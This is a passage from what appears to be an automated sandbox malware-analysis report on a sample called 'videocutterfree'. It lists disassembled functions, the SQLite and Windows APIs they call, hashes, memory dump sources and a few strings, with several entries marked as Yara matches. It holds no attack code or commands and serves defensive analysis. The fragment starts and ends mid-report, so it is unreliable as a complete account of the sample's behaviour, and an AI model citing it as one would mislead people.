                                                                              • Instruction ID: 650511a6c823edef335a2c74f6c577cde12f3289a802c3d5bc78c314c02cd88f
                                                                              • Opcode Fuzzy Hash: 72798e6e07424c6cfd52fc5155d1368cf78c711f8c1a415bfdd7b605eb1dd1fc
                                                                              • Instruction Fuzzy Hash: 6D11CE36614208EFCF009FA8D985A6AB7B8EF08320F00C05AFC04DF252E671EA04D7A1
                                                                              APIs
                                                                              • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 609034D8
                                                                              • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903521
                                                                              • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 6090354A
                                                                              • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903563
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                              • String ID:
                                                                              • API String ID: 1477753154-0
                                                                              • Opcode ID: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                              • Instruction ID: 848dca46e936c6e01d33e08870ae11aa620bd8b24bdb606da7ea596206f2e213
                                                                              • Opcode Fuzzy Hash: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                              • Instruction Fuzzy Hash: 44111F726186218FDB00EF7DC8817597FEAFB66308F00842DE865E7362E779D8819741
                                                                              APIs
                                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 009923D0
                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 009923DE
                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 00992401
                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 00992408
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                              • String ID:
                                                                              • API String ID: 4018804020-0
                                                                              • Opcode ID: d8616f0d76c9889a9caf20b99a50fbaacde41e78c56c36b5af666d5253b71a80
                                                                              • Instruction ID: 2843f171ee0d5606127ec4d561fe13bcf39f4e25db9af588fa1f12cf3fa6c714
                                                                              • Opcode Fuzzy Hash: d8616f0d76c9889a9caf20b99a50fbaacde41e78c56c36b5af666d5253b71a80
                                                                              • Instruction Fuzzy Hash: CE11CE32610204ABEB10EF6AD985B6AB7B8FF50714F10406DF9019A150D7BAFC01DBA0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                              • String ID:
                                                                              • API String ID: 3016257755-0
                                                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                              • Instruction ID: 3d7f7d81f1c6105c5c70c2801a6af1ff0b7c9694b9ffd7556bd2ad074738bab6
                                                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                              • Instruction Fuzzy Hash: AE01497200018EBBCF166E84CC55DEE3F36BB1A364B598915FE2859032D336C9B1AB81
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                                              • String ID:
                                                                              • API String ID: 3526213481-0
                                                                              • Opcode ID: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                              • Instruction ID: 98199466554994e62e20ad809be6129e3c08b78dd6d8c38fc18f61524e73aad2
                                                                              • Opcode Fuzzy Hash: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                              • Instruction Fuzzy Hash: 4101E9B5A043059BCB00EF69D485AAFBBF5EF68654F10C529EC9497304E774D841CF91
                                                                              APIs
                                                                              • sqlite3_prepare.SQLITE3 ref: 60969166
                                                                              • sqlite3_errmsg.SQLITE3 ref: 60969172
                                                                                • Part of subcall function 609258A8: sqlite3_log.SQLITE3 ref: 609258E5
                                                                              • sqlite3_errcode.SQLITE3 ref: 6096918A
                                                                                • Part of subcall function 609251AA: sqlite3_log.SQLITE3 ref: 609251E8
                                                                              • sqlite3_step.SQLITE3 ref: 60969197
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_log$sqlite3_errcodesqlite3_errmsgsqlite3_preparesqlite3_step
                                                                              • String ID:
                                                                              • API String ID: 2877408194-0
                                                                              • Opcode ID: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                              • Instruction ID: d4ebd4c9a05a553e526e78eaaf80584f3afcfe73b3175c4c6dada352db343273
                                                                              • Opcode Fuzzy Hash: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                              • Instruction Fuzzy Hash: 9F0186B091C3059BE700EF29C88525DFBE9EFA5314F11892DA89987384E734C940CB86
                                                                              APIs
                                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 009924A9
                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 009924B8
                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 009924CD
                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 009924D4
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                              • String ID:
                                                                              • API String ID: 4018804020-0
                                                                              • Opcode ID: 1a4ae14514d579dbb970edb5197c120a9e9e07e6d65eb4205ffde8d27d8cb92a
                                                                              • Instruction ID: 9924d45b242017e2e9f871fb73b2e51771b427bb57998db7c57ceeed03806f65
                                                                              • Opcode Fuzzy Hash: 1a4ae14514d579dbb970edb5197c120a9e9e07e6d65eb4205ffde8d27d8cb92a
                                                                              • Instruction Fuzzy Hash: B3F03C72110204AFDB00AF6AED49F9ABBACFF45720F008129FA05C6151D775F9508BA0
                                                                              APIs
                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 609084E9
                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 60908518
                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 60908528
                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 6090855B
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                              • String ID:
                                                                              • API String ID: 1477753154-0
                                                                              • Opcode ID: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                              • Instruction ID: c41a4d3f3efa942db11cbd34a9101edfe28f26dd6f673ba1da0d5803e4a0adbd
                                                                              • Opcode Fuzzy Hash: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                              • Instruction Fuzzy Hash: FD01A4B05093048BDB40AF25C5D97CABBA5EF15718F0884BDEC894F34AD7B9D5448BA1
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00992009
                                                                              • RtlDeleteCriticalSection.NTDLL(?), ref: 00992028
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00992037
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0099204E
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                              • String ID:
                                                                              • API String ID: 2456309408-0
                                                                              • Opcode ID: 64bdd9458e2c0b7ce0713510d92c06f598ed519a2c2bc87349ea5feb041fb656
                                                                              • Instruction ID: a90fdee795e25a8bdcbb652f54d5a6ae3adc237c4ae907903cf57924b636ab92
                                                                              • Opcode Fuzzy Hash: 64bdd9458e2c0b7ce0713510d92c06f598ed519a2c2bc87349ea5feb041fb656
                                                                              • Instruction Fuzzy Hash: B101F471404704DFCB34AF19E9087AAB7F8FF44314F044A1DF446826A0C7747944CB51
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Event$H_prologSleep
                                                                              • String ID:
                                                                              • API String ID: 1765829285-0
                                                                              • Opcode ID: 18f6574925515fcf22b9b48264f3957e22c61d5e5e496e5071a2b9b412d2ee7c
                                                                              • Instruction ID: e3c6709435f9e8ecd736dd2a8054a17545c0f94d2581bcb7e7277fc76fc2cc9f
                                                                              • Opcode Fuzzy Hash: 18f6574925515fcf22b9b48264f3957e22c61d5e5e496e5071a2b9b412d2ee7c
                                                                              • Instruction Fuzzy Hash: 0CF05E36614114EFCB00AF99DDC8B88BBB4FF0D321F0082A9FA19DB291C734A844DB61
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_log
                                                                              • String ID: into$out of
                                                                              • API String ID: 632333372-1114767565
                                                                              • Opcode ID: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                              • Instruction ID: de20b162988cb891a2f8fbcf22309076e3e21d241eadb06c465d82de9f0e8d92
                                                                              • Opcode Fuzzy Hash: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                              • Instruction Fuzzy Hash: 91910170A043149BDB26CF28C88175EBBBABF65308F0481E9E858AB355D7B5DE85CF41
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog_memmove
                                                                              • String ID: &'
                                                                              • API String ID: 3529519853-655172784
                                                                              • Opcode ID: c918b00d55b9cfdbd4311d463aeaca6b441a71fa30d10462a3852f9050df95f1
                                                                              • Instruction ID: 3b40f138eb48c217a55019f2445c21869489c16cd798437d48b27f2fb3d85259
                                                                              • Opcode Fuzzy Hash: c918b00d55b9cfdbd4311d463aeaca6b441a71fa30d10462a3852f9050df95f1
                                                                              • Instruction Fuzzy Hash: A0619071D00209DBDF20EFA8C981BEEFBB9AF95310F10816EE505BB191DB705A45CB61
                                                                              APIs
                                                                                • Part of subcall function 60918408: sqlite3_value_text.SQLITE3 ref: 60918426
                                                                              • sqlite3_free.SQLITE3 ref: 609193A3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_freesqlite3_value_text
                                                                              • String ID: (NULL)$NULL
                                                                              • API String ID: 2175239460-873412390
                                                                              • Opcode ID: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                              • Instruction ID: 63658e955800b40111a930d2026d12727b3b294c4be858d68b3f7c51d7abf176
                                                                              • Opcode Fuzzy Hash: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                              • Instruction Fuzzy Hash: E3514B31F0825A8EEB258A68C89479DBBB6BF66304F1441E9C4A9AB241D7309DC6CF01
                                                                              APIs
                                                                              • GetCPInfo.KERNEL32(?,00000000), ref: 004050C1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: Info
                                                                              • String ID: $
                                                                              • API String ID: 1807457897-3032137957
                                                                              • Opcode ID: cd88601ac4690f7c3bf36e0dd2dda664ed615bbaf1acac2202640a2d4584269f
                                                                              • Instruction ID: 195c675fc4e5f590e83e978609f8c0d81ce532fbad917a7cc75260899aa7fe4e
                                                                              • Opcode Fuzzy Hash: cd88601ac4690f7c3bf36e0dd2dda664ed615bbaf1acac2202640a2d4584269f
                                                                              • Instruction Fuzzy Hash: 1D4147318047582AEB119714ED49BFB3FA8EB02704F1404F6E945FA1D3C2794918DFAB
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_log
                                                                              • String ID: string or blob too big$|
                                                                              • API String ID: 632333372-330586046
                                                                              • Opcode ID: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                              • Instruction ID: 65a9847582dc10a4f4f17f1c4fc8d82f10366072c52f03016cacc5a11d353e3e
                                                                              • Opcode Fuzzy Hash: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                              • Instruction Fuzzy Hash: 4D51B9749083689BCB22CF28C985789BBF6BF59314F1086D9E49897351C775EE81CF41
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_logsqlite3_value_text
                                                                              • String ID: string or blob too big
                                                                              • API String ID: 2320820228-2803948771
                                                                              • Opcode ID: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                                              • Instruction ID: 1f8da1134a73d261049fdcd83983d84c916c8a3f87851362e697cdb17b1d2bab
                                                                              • Opcode Fuzzy Hash: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                                              • Instruction Fuzzy Hash: F631D9B0A083249BCB25DF28C881799B7FABF69304F0085DAE898A7301D775DE81CF45
                                                                              APIs
                                                                              • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,00997182,?,?,00000000), ref: 0099847F
                                                                              • getsockname.WS2_32(?,?,?), ref: 00998495
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLastgetsockname
                                                                              • String ID: &'
                                                                              • API String ID: 566540725-655172784
                                                                              • Opcode ID: 32913b9d91235a8e9199aa0286960388572c32e8dc8971afd0e84bf35e1367f5
                                                                              • Instruction ID: 203dd814bd0dfaade2f035e1a77da1ed9be835a2af2946654a7ea8b2216edf90
                                                                              • Opcode Fuzzy Hash: 32913b9d91235a8e9199aa0286960388572c32e8dc8971afd0e84bf35e1367f5
                                                                              • Instruction Fuzzy Hash: 19219272A00209EBDF10DFACD845ACFB7F5FF48324F10856AE919EB291DB34A9058750
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0099BA63
                                                                                • Part of subcall function 0099C03F: std::exception::exception.LIBCMT ref: 0099C06E
                                                                                • Part of subcall function 0099C7F5: __EH_prolog.LIBCMT ref: 0099C7FA
                                                                                • Part of subcall function 009A28FC: _malloc.LIBCMT ref: 009A2914
                                                                                • Part of subcall function 0099C09E: __EH_prolog.LIBCMT ref: 0099C0A3
                                                                              Strings
                                                                              • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 0099BAA0
                                                                              • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 0099BA99
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog$_mallocstd::exception::exception
                                                                              • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                                              • API String ID: 1953324306-1943798000
                                                                              • Opcode ID: 5c41d54f36db6d1c7742c210bf5013c278e32d56ea2f92e741726d0b37c54de2
                                                                              • Instruction ID: 19fe6814485a124f1c5f80eb1c94eb6df103ce183e76ef81d80c76e2addf2d75
                                                                              • Opcode Fuzzy Hash: 5c41d54f36db6d1c7742c210bf5013c278e32d56ea2f92e741726d0b37c54de2
                                                                              • Instruction Fuzzy Hash: F321ABB1E042089ADF14EFECE945BEDBBB8EF91710F00405DF815AB281DB705A04CBA0
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0099BB58
                                                                                • Part of subcall function 0099C116: std::exception::exception.LIBCMT ref: 0099C143
                                                                                • Part of subcall function 0099C92C: __EH_prolog.LIBCMT ref: 0099C931
                                                                                • Part of subcall function 009A28FC: _malloc.LIBCMT ref: 009A2914
                                                                                • Part of subcall function 0099C173: __EH_prolog.LIBCMT ref: 0099C178
                                                                              Strings
                                                                              • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 0099BB95
                                                                              • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 0099BB8E
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog$_mallocstd::exception::exception
                                                                              • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                              • API String ID: 1953324306-412195191
                                                                              • Opcode ID: df3aa1839ba5ee9fcade9527ef3a43a2a474106f258decaa74e217ab55490dac
                                                                              • Instruction ID: 8b43e8f8fc380d2fcfb0416eced1faf70d6cbef83766a85f494f07ec98747ebe
                                                                              • Opcode Fuzzy Hash: df3aa1839ba5ee9fcade9527ef3a43a2a474106f258decaa74e217ab55490dac
                                                                              • Instruction Fuzzy Hash: 8521BFB1E042489ADF24EFECE945BEDBBB8EF95310F00401DF815A7291DBB45A44DBA0
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 0099535D
                                                                                • Part of subcall function 009A1D5C: __FF_MSGBANNER.LIBCMT ref: 009A1D73
                                                                                • Part of subcall function 009A1D5C: __NMSG_WRITE.LIBCMT ref: 009A1D7A
                                                                                • Part of subcall function 009A1D5C: RtlAllocateHeap.NTDLL(00B10000,00000000,00000001), ref: 009A1D9F
                                                                              • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 0099536F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateFolderHeapPathSpecial_malloc
                                                                              • String ID: \save.dat
                                                                              • API String ID: 4128168839-3580179773
                                                                              • Opcode ID: 62399f78455698b091c10cfa56bc65622fa0a638e688e1fc6dd5b0e4e8833cba
                                                                              • Instruction ID: 31a0b4b8fa2add44b7b7f150fcbec38f0f9f892c6adcec63e40825492be98320
                                                                              • Opcode Fuzzy Hash: 62399f78455698b091c10cfa56bc65622fa0a638e688e1fc6dd5b0e4e8833cba
                                                                              • Instruction Fuzzy Hash: FC117172904601ABDF269F6D8891D5FBF6BDF837A0B1542A9FC4467202D5A21D02C3A0
                                                                              APIs
                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 60914096
                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 609140A2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                              • String ID:
